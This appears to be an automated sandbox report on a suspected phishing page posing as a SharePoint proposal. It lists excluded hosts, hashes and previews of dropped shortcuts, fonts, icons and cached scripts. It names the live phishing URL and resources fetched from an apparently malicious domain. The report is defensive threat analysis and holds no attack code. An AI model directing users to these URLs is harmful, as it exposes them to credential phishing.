Cookbook file name:	defaultwindowsinteractivecookbook.jbs
Sample URL:	https://campus.espaciocicfa.com/Sharepointproposal/
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	14
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	EGA enabled
Analysis Mode:	stream
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal48.phis.win@18/52@32/262

Warnings

Exclude process from analysis (whitelisted): svchost.exe
Excluded IPs from analysis (whitelisted): 192.178.50.35, 172.217.2.206, 142.250.97.84, 34.104.35.123, 23.56.5.194, 23.56.5.217, 13.107.213.51, 13.107.246.40, 13.107.246.41, 13.107.213.69, 13.107.246.51, 13.107.213.41, 13.107.213.70, 13.107.246.69, 52.109.2.112, 20.110.205.119, 142.250.217.170, 192.178.50.74, 172.217.15.202, 142.250.217.202, 142.251.35.234, 192.178.50.42, 142.250.64.202, 142.250.64.138, 142.250.189.138, 142.250.217.234, 142.250.64.170, 204.79.197.237, 13.107.21.237
Excluded domains from analysis (whitelisted): accounts.google.com, content-autofill.googleapis.com, c-msn-com-nsatc.trafficmanager.net, c-bing-com.dual-a-0034.a-msedge.net, cdn.forms.office.net.edgesuite.net, clientservices.googleapis.com, customervoice-prod.forms.office.com.akadns.net, a1894.dscms.akamai.net, clients2.google.com, customervoice.microsoft.com, edgedl.me.gvt1.com, prod.lists.office.com.akadns.net, c.bing.com, dual-a-0034.a-msedge.net, clients.l.google.com, c1.microsoft.com
Not all processes where analyzed, report is missing behavior information

Created / dropped Files

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Apr 4 09:44:11 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2673
Entropy (8bit):	3.9932809074642313
Encrypted:	false
SSDEEP:
MD5:	AE51134F5861DD23E7D414768F19C7CC
SHA1:	8B38CB1830D3C72A6594AD6BD8BD7B3E7F42ECE1
SHA-256:	AD4A35AD8415E6E277EB0204021518F00EACFB76C441026C4937D1B17A032C87
SHA-512:	F0019F0D3AFC0053D9B31C95C81233C03638E152CDA34CBE1E2546BCD9450EA29517A86513F3E17FE168C7A52358AAB08CF635015A7B100C69FD56D8FB7A45F5
Malicious:	false
Reputation:	unknown
Preview:	L..................F.@.. ...$+.,.....y..}...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I.X\|U....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.X.U....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.X.U....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.X.U..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.X.U...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............EV.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Apr 4 09:44:11 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2675
Entropy (8bit):	4.0086735403497
Encrypted:	false
SSDEEP:
MD5:	FAA8F6F308E7332B4552365432FA84DC
SHA1:	CBA1CBEB44F9299EB85FC524E4D28CD00A361316
SHA-256:	8976231475E868CF99F0C230C7099630D43D344BF1E7D272E9FA8F9B6F357930
SHA-512:	925EAB62CFE1114522D9B4CA371E1880C8A7CD447EE2F8DCA61BB41E9F4451324933F5C1206A57124FE22C458D5117ECD7B79CBC8AFD36206DAA67D90FF5173D
Malicious:	false
Reputation:	unknown
Preview:	L..................F.@.. ...$+.,........}...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I.X\|U....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.X.U....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.X.U....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.X.U..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.X.U...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............EV.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Oct 6 08:05:01 2023, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2689
Entropy (8bit):	4.013707813907646
Encrypted:	false
SSDEEP:
MD5:	79374FF8506A1920457027DEE13995FE
SHA1:	52C27FE9FE08B0CBC8F92E5E4B5AE06CA4C420E1
SHA-256:	9AF626B370E3EE56B861A3BB43A430F282813B7413042A37629357D41A5674BB
SHA-512:	B5FFC609BD918224CC42D480DE97D3EEBFE8CDE52748A7A28E53F22274B213B8993863D8A217127F2F30C89D428A5640740C413C2FC0AFE09432CD61CAFC1186
Malicious:	false
Reputation:	unknown
Preview:	L..................F.@.. ...$+.,.....Y.04...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I.X\|U....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.X.U....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.X.U....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.X.U..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VFW.E...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............EV.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Apr 4 09:44:11 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2677
Entropy (8bit):	4.0070138222945655
Encrypted:	false
SSDEEP:
MD5:	D6154110626FFB22B9EC0926E40C7E30
SHA1:	32EEF9AAF81BA8D05B34BC679CF7FC84E3209ABA
SHA-256:	065EA580EEDB1F669310CEC31AFB5E1824BD2B1ACF508153BEA2CECCF4C12B9C
SHA-512:	8A322A73DEB75DFAB5947BB3A3022ECA10C5279C0E591DE34C9A9BB53C1D2FC46BDE7BA7DF57C2BFCCAFB3206982DA4AEC7DB709DA0207F6CFCC940306414BA8
Malicious:	false
Reputation:	unknown
Preview:	L..................F.@.. ...$+.,....w..}...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I.X\|U....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.X.U....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.X.U....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.X.U..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.X.U...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............EV.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Apr 4 09:44:11 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2677
Entropy (8bit):	3.9966980025998766
Encrypted:	false
SSDEEP:
MD5:	0BE7223D0E1805DBB13DCEBBEC7CB583
SHA1:	75EDC420912074A1E4F9A059F1F2766E2472FB03
SHA-256:	E3D224A6D25BF2D54AF67D449FE1EC0872D7A42BF4FAB14AAEB4399A0D15FF01
SHA-512:	E30FE09EA1BEA0DB4EBD1A8577ABABFAAE00E296B85FACCF7D433CB30A5EA043013317A80C202BB17E1AEBACF716D6B0AE57236F865D4FD3AB964C9ABB0CF93C
Malicious:	false
Reputation:	unknown
Preview:	L..................F.@.. ...$+.,........}...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I.X\|U....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.X.U....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.X.U....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.X.U..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.X.U...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............EV.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Apr 4 09:44:11 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2679
Entropy (8bit):	4.005243274716456
Encrypted:	false
SSDEEP:
MD5:	D3330AE24A43090B3E594570E40D050A
SHA1:	CF9CDEA10BE36380579907A8B1946A52E2194F01
SHA-256:	B623B84F30F903A72902792672B8CB2153725A1C4C2F768778B521C4C9B8A5C3
SHA-512:	9B22586B68EB79B1285B990CFB64F455C8C53FD182161DC44B19673DCCC6F80A9D2D76E301499F0195C178477B11783473D99A6491F2704A07535FFFBC19490A
Malicious:	false
Reputation:	unknown
Preview:	L..................F.@.. ...$+.,..../..}...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I.X\|U....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.X.U....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.X.U....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.X.U..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.X.U...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............EV.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

Chrome Cache Entry: 102

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	Web Open Font Format (Version 2), TrueType, length 43596, version 1.0
Category:	downloaded
Size (bytes):	43596
Entropy (8bit):	7.9952701440723475
Encrypted:	true
SSDEEP:
MD5:	2A05E9E5572ABC320B2B7EA38A70DCC1
SHA1:	D5FA2A856D5632C2469E42436159375117EF3C35
SHA-256:	3EFCB941AADDAF4AEA08DAB3FB97D3E904AA1B83264E64B4D5BDA53BC7C798EC
SHA-512:	785AB5585B8A9ED762D70578BF13A6A69342441E679698FD946E3616EF5688485F099F3DC472975EF5D9248AFAAD6DA6779813B88AA1DB60ABE2CC065F47EB5F
Malicious:	false
Reputation:	unknown
URL:	https://0fs.akedespr.com/897oYNDwhfDP25K2A11E12EDqs3v9MI4yz80
Preview:	wOF2.......L.......P..............................U...z...?HVAR.;?MVARF.`?STAT...H/L.....@..P..>.0....6.$..x. .....{[.q....Rl....t..~v....(....T.t.;..n'..v=....?...l].xI...m."..?hNX.,...8.;G...m,}.h.>(=[...m/.>....8&f..&.......].u...&.VD..].<..yR.eb<,x......)..c..t...k...9..o.T..R9..kq..TR%U..v....r._......D...f..=qH...8.<...x..(V.I.h.L3#]8...-.z.........3.9V..........u.........x.....S_...\1...&6...j^...c;()m.J.....>....xz..Y...\|.7......!.jw...,.L.;N.......n......].....8].R..d.....`.R.B..#..,...1R.UJD..b.`.0<....FA=..{.....`....c...R..Uy..J.k.".j..N.{w..UT<.8T66...H,...FH.GS.G.]......?.T.!4..8...B...l.p@.......t.o...v...b.g..?..m..!.%.....x..MC1M...........k...})..+N.....Q_yS.X.11a....&`..'".xZ..=b^...iD...} .. ..b...}DIvu.q....k.4.....@.....P..j..)..'.L......b..RQjII..Qk.T.l._wO..$....!c..%.{.._N..E@....A...?...aW.y.gf.g.&E... ~.x.b....b...~......f/.....G....J.6.y.....zE@T.a.0^Ul......S:..,..}..B.R..Rt~.v...L:`4.IKA..V...x&@...h.7.P......

Chrome Cache Entry: 104

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (65536), with no line terminators
Category:	downloaded
Size (bytes):	106905
Entropy (8bit):	5.415531070622475
Encrypted:	false
SSDEEP:
MD5:	8C8C1FE0AC646A94EA36A9244AF4FE31
SHA1:	F40BD18721DE1CFB42265EBD1E5A25ED23D354E3
SHA-256:	85D6D3D9A68FE179F9787CF2B8B5C8C33776E2D0CF4CAA1B4A115400F7CCB0BC
SHA-512:	4E473A10D700911CF65A300598A12A70A40D79BC0FE030D3B4A89AE796A8CF7FA504B89D4A843109BACD8C2653BAEF3ED0472AB2189F8FEDF3E356208B140757
Malicious:	false
Reputation:	unknown
URL:	https://cdn.forms.office.net/forms/scripts/dists/response-page-pro.chunk.postsubmit.a3770c1.js
Preview:	"use strict";(self.webpackChunk=self.webpackChunk\|\|[]).push([[653],{65690:function(e,t,r){function n(e){i!==e&&(i=e)}function o(){return void 0===i&&(i="undefined"!=typeof document&&!!document.documentElement&&"rtl"===document.documentElement.getAttribute("dir")),i}var i;function a(){return{rtl:o()}}r.d(t,{Eo:function(){return a},ok:function(){return n}}),i=o()},36178:function(e,t,r){r.d(t,{Y:function(){return u},q:function(){return i}});var n,o=r(59312),i={none:0,insertNode:1,appendChild:2},a="undefined"!=typeof navigator&&/rv:11.0/.test(navigator.userAgent),s={};try{s=window\|\|{}}catch(e){}var u=function(){function e(e,t){var r,n,a,s,u,l;this._rules=[],this._preservedRules=[],this._counter=0,this._keyToClassName={},this._onInsertRuleCallbacks=[],this._onResetCallbacks=[],this._classNameToArgs={},this._config=(0,o.pi)({injectionMode:"undefined"==typeof document?i.none:i.insertNode,defaultPrefix:"css",namespace:void 0,cspSettings:void 0},e),this._classNameToArgs=null!==(r=null==t?void 0

Chrome Cache Entry: 105

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	SVG Scalable Vector Graphics image
Category:	dropped
Size (bytes):	2905
Entropy (8bit):	3.962263100945339
Encrypted:	false
SSDEEP:
MD5:	FE87496CC7A44412F7893A72099C120A
SHA1:	A0C1458C08A815DF63D3CB0406D60BE6607CA699
SHA-256:	55CE3B0CE5BC71339308107982CD7671F96014256DED0BE36DC8062E64C847F1
SHA-512:	E527C6CD2A3D79CA828A9126E8FF7009A540AA764082750D4FA8207C2B8439CA1FDC4459E935D708DC59DCFFE55FE45188EB5E266D1B745FCA7588501BC0117D
Malicious:	false
Reputation:	unknown
Preview:	<svg xmlns="http://www.w3.org/2000/svg" width="48" height="48" viewBox="0 0 48 48"><title>assets</title><rect width="48" height="48" fill="none"/><path d="M30.422,29.092a3.493,3.493,0,0,1,1.324.261,3.381,3.381,0,0,1,1.132.749q.366.366.827.775t.949.854q.488.444.941.932a9.974,9.974,0,0,1,.819,1A4.951,4.951,0,0,1,37,34.736a3.133,3.133,0,0,1,.218,1.15,3.493,3.493,0,0,1-.261,1.324,3.381,3.381,0,0,1-.749,1.132q-.888.888-1.6,1.568a8.753,8.753,0,0,1-1.489,1.15,6.17,6.17,0,0,1-1.716.705A9.367,9.367,0,0,1,29.151,42a13.73,13.73,0,0,1-3.9-.592A21.891,21.891,0,0,1,21.26,39.77a27.749,27.749,0,0,1-3.885-2.491,34.863,34.863,0,0,1-3.6-3.153,34.6,34.6,0,0,1-3.127-3.606,27.717,27.717,0,0,1-2.456-3.876A22.2,22.2,0,0,1,6.584,22.69,13.485,13.485,0,0,1,6,18.866,9.453,9.453,0,0,1,6.235,16.6a6.2,6.2,0,0,1,.7-1.707,8.848,8.848,0,0,1,1.141-1.489q.679-.723,1.585-1.611a3.381,3.381,0,0,1,1.132-.749,3.493,3.493,0,0,1,1.324-.261,3.3,3.3,0,0,1,1.681.47,8.648,8.648,0,0,1,1.542,1.15,17.725,17.725,0,0,1,1.376,1.428q.645.

Chrome Cache Entry: 106

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with no line terminators
Category:	downloaded
Size (bytes):	76
Entropy (8bit):	4.631455882779888
Encrypted:	false
SSDEEP:
MD5:	55D6D0CAE462E2BC690BC8AF45985B15
SHA1:	0AD644096680FB01BFD9AF1CFE5F6E68911EA01F
SHA-256:	2E5AE61757DB10E0E3770407B68ADE329068C840070A02F119C9EBE296194043
SHA-512:	A929EE066B9150F1DC864A38FC1BF7D1F69B560CF6C123C0709EC983581B0B5F37360B3F318CA78EC9A3755C592A2928FA882CB34F160381ADA5A148B0786BCA
Malicious:	false
Reputation:	unknown
URL:	https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzISMwkjQ0XI5E1ADxIFDc8jKv8SBQ3Fk8QkEgUNiaVnyxIFDcMZOZASBQ3QAkDsEgUNqF3jdA==?alt=proto
Preview:	CjYKBw3PIyr/GgAKBw3Fk8QkGgAKBw2JpWfLGgAKBw3DGTmQGgAKBw3QAkDsGgAKBw2oXeN0GgA=

Chrome Cache Entry: 107

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (554)
Category:	downloaded
Size (bytes):	510578
Entropy (8bit):	5.695280300193632
Encrypted:	false
SSDEEP:
MD5:	E9CCB3DBDE79BA5FFDF9CAD4B32D59FD
SHA1:	3A8CD67ADC7C885BDF683F1E7F491E6A4A50679F
SHA-256:	8F2C6777C7CCC01AB67290FA8ACD5A4C4866BE64129F39DFAEB9197DFA15E137
SHA-512:	5CA7C8439030C9B4B966760C660640A094B0D6E30E10DF85D7B900C6F9108B0E309298ED93C006634BB3F437BAB3CFF1B83A5D1B18C666C04346F0856294C461
Malicious:	false
Reputation:	unknown
URL:	https://www.gstatic.com/recaptcha/releases/rz4DvU-cY2JYCwHSTck0_qm-/recaptcha__en.js
Preview:	(function(){/.. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0././.. Copyright 2005, 2007 Bob Ippolito. All Rights Reserved.. Copyright The Closure Library Authors.. SPDX-License-Identifier: MIT././. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0././.. SPDX-License-Identifier: Apache-2.0./.var y=function(){return[function(E,X,B,M,c,v,Y,I,h,J,F,a,C,R,P){return E+4>>3==(E-8<<2>=(R=[1,"F",22],E)&&(E+2&12)<E&&(M=u[32](4,B[R[1]]),P=A[16](32,0,X,B[R[1]],M)),R[0])&&(M=void 0===M?null:M,Y=[3,341,278],c=d[46](16,21,X,u[31](32,B)),J=e[48](7,Y[0],X,u[31](35,X),u[31](28,Y[R[0]])),I=g[27](77,15,u[31](29,X),X,u[31](33,438)),v=u[31](38,Y[2]),a=A[32](R[2],l[13](2,d[9](48,36),X),[u[7](24,v),u[31](34,X)]),C=[c,J,I,a],null!=M&&(h=A[8](73),F=A[8](72),C=[W[30](8,h,u[31](28,B),u[31](37,0))].concat(C,[W[30](8,.F,R[0],R[0]),h,e[39](12,M,X),F])),P=C),P}]}(),g=function(){return[function(E,X,B,M,c,v){return 3<=((((E^(v=[7,"W",2],19))&v[0]\|\|(this[v

Chrome Cache Entry: 108

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 2 x 2, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	61
Entropy (8bit):	3.990210155325004
Encrypted:	false
SSDEEP:
MD5:	9246CCA8FC3C00F50035F28E9F6B7F7D
SHA1:	3AA538440F70873B574F40CD793060F53EC17A5D
SHA-256:	C07D7D29E3C20FA6CA4C5D20663688D52BAD13E129AD82CE06B80EB187D9DC84
SHA-512:	A2098304D541DF4C71CDE98E4C4A8FB1746D7EB9677CEBA4B19FF522EFDD981E484224479FD882809196B854DBC5B129962DBA76198D34AAECF7318BD3736C6B
Malicious:	false
Reputation:	unknown
Preview:	.PNG........IHDR...............s....IDAT.....$.....IEND.B`.

Chrome Cache Entry: 109

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced
Category:	downloaded
Size (bytes):	231
Entropy (8bit):	6.725074433303473
Encrypted:	false
SSDEEP:
MD5:	547988BAC5584B4608466D761E16F370
SHA1:	C11BB71049702528402A31027F200184910A7E23
SHA-256:	70E32B2DB3F079BB0295A85A0DB15ED9E5926294DD947938D6CFA595F5AB18B4
SHA-512:	C4A76F6E94982D1CC02C2B67523A334E76BFDE525C1014D32DB9E7ECA0FA39A06F291ECFA94C8C6A49D488EA3ACF9C10DDF3CAD9515562010440863D0F08FBA3
Malicious:	false
Reputation:	unknown
URL:	https://0fs.akedespr.com/wxHnxijYHv5hJecsgyCQHj8KsryJopgVQZPRFuPCcUrJwS12130
Preview:	.PNG........IHDR..............w=.....sRGB.........IDATHK...1...Z......... #$#..-.. $$3..H...q.x.>.x..yY.\|.@h.......$.B/..*Ec...J.}.....Rl..^.......#-...f.6p.cJigf...G.<.!.z..>a.+j....&U.....E/.._.`.d...~_....7...4`....IEND.B`.

Chrome Cache Entry: 110

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	SVG Scalable Vector Graphics image
Category:	dropped
Size (bytes):	7390
Entropy (8bit):	4.02755241095864
Encrypted:	false
SSDEEP:
MD5:	B59C16CA9BF156438A8A96D45E33DB64
SHA1:	4E51B7D3477414B220F688ADABD76D3AE6472EE3
SHA-256:	A7EE799DD5B6F6DBB70B043B766362A6724E71458F9839306C995F06B218C2F8
SHA-512:	2C7095E4B819BC5CAA06811A55C0DAE6706970F981806DCF7FD41F744C1DC6A955657A8E57829B39B376B892E8173E8A41F683D329CFBBD0EC4D4019B10E52FF
Malicious:	false
Reputation:	unknown
Preview:	<svg width="48" height="48" viewBox="0 0 48 48" fill="none" xmlns="http://www.w3.org/2000/svg">..<mask id="07b26034-56a3-49d2-8f26-c7b84eb4eed4" fill="#ffffff">..<path fill-rule="evenodd" clip-rule="evenodd" d="M23.9762 0C16.8244 0 10.9707 5.24325 10.335 12.9974C6.89614 14.0647 4.5 17.2233 4.5 20.9412C4.50019 20.968 4.50041 20.9949 4.50066 21.0218C4.50022 21.0574 4.5 21.093 4.5 21.1287C4.55021 28.2609 6.80967 39.1601 18.6091 46.4932C21.8225 48.5023 25.8896 48.5023 29.1532 46.4932C41.053 39.2103 43.3125 28.3111 43.3125 21.1287C43.3125 21.108 43.3124 21.0872 43.3123 21.0665C43.3124 21.0246 43.3125 20.9829 43.3125 20.9412C43.3125 17.3371 41.0055 14.1946 37.6702 13.0618C37.0607 5.27148 31.147 0 23.9762 0ZM12.2354 38.4694C14.3087 33.9987 18.8368 30.8981 24.0891 30.8981C29.2395 30.8981 33.6936 33.8797 35.8194 38.2109C33.9302 40.6119 31.4399 42.8954 28.1744 44.8939L28.1724 44.8952L28.1703 44.8965C25.5047 46.5374 22.2037 46.5293 19.6031 44.9034L19.6009 44.902L19.5988 44.9007C16.4876 42.9672 14

Chrome Cache Entry: 111

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	Unicode text, UTF-8 text, with very long lines (65534), with no line terminators
Category:	downloaded
Size (bytes):	109964
Entropy (8bit):	5.201196778775329
Encrypted:	false
SSDEEP:
MD5:	78A5500114640D663460BCBB33E694EB
SHA1:	C72B1B93C8BC2DDBD77BA3C042A8ED415B6B8E26
SHA-256:	E97FE9DB7CA567DA1F9F5A3B87B669146ADDF1983392C32FDA68C4D667A3CA22
SHA-512:	AAEB2961C7F93B8DF2600068C48706920D0DA1E1C2C925FBDFBED10E33120B05C9722ECBB63C6B3DD534D664CFB5F183CCF850591BBB78DAA89E0A3F637A450C
Malicious:	false
Reputation:	unknown
URL:	https://0fs.akedespr.com/56g7SeCQ68IIIeqtTzk41DQIWbO2klRJ3aFtjdPV38Hr189110
